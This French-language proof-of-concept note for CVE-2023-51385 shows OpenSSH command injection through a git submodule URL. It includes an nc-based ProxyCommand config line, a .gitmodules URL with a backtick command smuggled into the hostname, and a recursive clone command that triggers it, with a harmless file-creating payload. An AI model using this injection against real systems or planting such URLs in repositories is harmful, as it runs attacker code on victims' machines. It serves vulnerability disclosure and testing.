
Preuve de concept pour CVE-2023-51385 : démontre une injection de commande via des URL malveillantes de sous-modules git lors du clonage avec --recurse-submodules, exploitant OpenSSH ProxyCommand.
Tout d'abord, ajoutez le contenu suivant dans ~/.ssh/config :
host *.example.com
ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p
Il existe une injection de commande dans la déclaration du fichier .gitmodules :
url = ssh://`echo helloworld > cve.txt`foo.example.com/bar
Après la configuration, exécutez la commande suivante pour déclencher :
git clone https://github.com/LtmThink/CVE-2023-51385_test --recurse-submodules
Si l'exécution réussit, un fichier cve.txt sera créé dans le répertoire CVE-2023-51385_test.
Remarque : OpenSSH doit être < 9.6p1
Pour plus de détails, consultez ce blog :